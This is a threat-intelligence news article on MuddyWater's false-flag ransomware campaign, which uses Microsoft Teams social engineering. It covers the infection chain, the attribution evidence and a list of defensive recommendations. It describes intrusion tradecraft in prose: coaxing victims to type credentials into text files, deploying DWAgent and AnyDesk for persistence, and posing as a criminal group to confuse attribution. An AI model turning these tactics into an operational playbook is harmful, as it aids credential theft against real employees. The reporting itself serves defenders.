MuddyWater's Microsoft Teams Campaign Exposes Blurring Lines Between State-Sponsored and Cybercrime Attacks

The Iranian state-sponsored hacking group MuddyWater has been conducting a sophisticated campaign that leverages Microsoft Teams for credential theft in what researchers are calling a "false flag" ransomware operation. This campaign, observed by Rapid7 in early 2026, represents a concerning trend where state-sponsored actors increasingly adopt cybercriminal tradecraft to muddy attribution and complicate defensive responses.

Social Engineering via Teams

The attack begins with a high-touch social engineering phase conducted directly through Microsoft Teams. Attackers initiate external chat requests to engage with employees, then utilize interactive screen-sharing sessions to harvest credentials and manipulate multi-factor authentication (MFA).

"The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," Rapid7 reported. "Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and long-term persistence via remote management tools like DWAgent."

This approach allows the attackers to establish an initial foothold without raising immediate suspicion, as Teams communications appear legitimate to unsuspecting employees.

False Flag Operation

What makes this campaign particularly noteworthy is its deliberate attempt to mimic financially motivated ransomware-as-a-service (RaaS) groups. The attackers initially appeared to be associated with the Chaos RaaS group, which emerged in early 2025 and has claimed 36 victims primarily in the U.S., construction, manufacturing, and business services sectors.

Chaos employs a double extortion model using mail flooding and vishing via Teams, often impersonating IT support personnel to trick victims into installing remote access tools like Microsoft Quick Assist. The group has demonstrated triple extortion through DDoS threats and quadruple extortion by threatening to contact customers or competitors.

However, evidence points to MuddyWater conducting a targeted state-backed attack that merely masquerades as opportunistic extortion. The Iranian group has strategically adopted Chaos tactics while maintaining its own objectives.

Sophisticated Infection Chain

The intrusion analyzed by Rapid7 reveals a multi-stage infection chain that demonstrates considerable technical sophistication:

1. Initial access through Teams screen-sharing sessions where victims are instructed to enter credentials into locally created text files
2. Use of compromised user accounts for reconnaissance and establishing persistence
3. Deployment of remote management tools like DWAgent and AnyDesk for long-term access
4. Lateral movement throughout the victim's environment
5. Data exfiltration
6. Contact via email for ransom negotiations (though no actual encryption occurs)

The technical execution involves downloading an executable ("ms_upd.exe") from an external server using RDP and curl. This binary initiates a multi-stage infection chain that delivers additional malicious components:

• ms_upd.exe (Stagecomp): Collects system information and communicates with C2 servers to drop next-stage payloads
• game.exe (Darkcomp): A bespoke remote access trojan (RAT) masquerading as a legitimate Microsoft WebView2 application
• WebView2Loader.dll: A legitimate DLL required by Microsoft Edge WebView2
• visualwincomp.txt: An encrypted configuration file used by the RAT

"While connected, the TA [threat actor] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally created text files," Rapid7 explained. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access."

Attribution Challenges

Attribution to MuddyWater comes from the use of a code-signing certificate attributed to "Donald Gay" to sign "ms_upd.exe." This certificate has been previously used by the threat cluster to sign its malware, including a CastleLoader downloader called Fakeset.

The findings underscore a growing convergence between state-sponsored intrusion activity and cybercriminal tradecraft designed specifically to obscure attribution and delay defensive responses.

"The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution," Rapid7 noted. "Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms."

Strategic Objectives

This approach serves multiple strategic objectives for the Iranian group:

1. Plausible deniability: By mimicking criminal groups, MuddyWater can create confusion about their involvement
2. Operational flexibility: Leveraging criminal infrastructure and techniques expands their capabilities
3. Distraction: The ransomware component appears to function primarily as an obfuscation mechanism rather than the primary objective
4. Intelligence gathering: The data exfiltration suggests strategic information collection

This pattern aligns with MuddyWater's history of conducting ransomware attacks while maintaining state-sponsored objectives. In September 2020, they targeted Israeli organizations with a loader called PowGoop that deployed a variant of Thanos ransomware. In 2023, they partnered with DEV-1084 to conduct destructive attacks under the pretext of ransomware deployment. As recently as October 2025, they used the Qilin ransomware to target an Israeli government hospital.

Broader Context of Iranian Cyber Operations

This campaign exists within a broader escalation of Iranian-linked cyber operations. Hunt.io recently revealed an Iranian-nexus operation targeting Omani government institutions, exfiltrating over 26,000 Ministry of Justice user records, judicial case data, and registry hives.

Pro-Iran hacktivist groups like Handala Hack have also increased activity, claiming to have published details on nearly 400 U.S. Navy personnel in the Persian Gulf and attacking the Port of Fujairah in the UAE, leaking over 11,000 sensitive documents.

"The cyber and kinetic domains are now explicitly connected," noted Sergey Shykevich, group manager at Check Point Research. "Stolen port infrastructure data was allegedly used to enable physical missile targeting. This campaign is not slowing down. Every quiet period on the physical front has historically been followed by intensified cyber activity."

Defensive Recommendations

Organizations should consider several defensive measures to protect against similar attacks:

1. Microsoft Teams hardening:

   • Restrict external chat permissions
   • Implement strict screen-sharing policies
   • Monitor for unusual Teams activity patterns
   • Train users to recognize sophisticated social engineering attempts

2. Credential protection:

   • Implement phishing-resistant MFA solutions
   • Use password managers to avoid credential entry in untrusted files
   • Monitor for credential harvesting activities

3. Endpoint detection:

   • Monitor for suspicious process chains involving curl, RDP, and remote access tools
   • Implement application control to prevent execution of unapproved tools
   • Regularly update and patch remote access software

4. Network segmentation:

   • Limit lateral movement capabilities
   • Isolate critical systems from general network access
   • Implement strict access controls for VPN configurations

5. Threat hunting:

   • Actively search for persistence mechanisms like DWAgent and AnyDesk
   • Monitor for unusual data exfiltration
   • Check for signs of certificate abuse in code signing

The convergence of state-sponsored and cybercriminal tactics represents a significant challenge for defenders. Organizations must adopt more sophisticated detection and response strategies that can identify the underlying objectives of attacks, even when they're disguised as common criminal activity.

As Shykevich warns, "What we're seeing now is the most serious manifestation of that pattern to date." The blurring lines between different threat actor motivations require defenders to look beyond surface-level indicators and understand the full context of potential intrusions.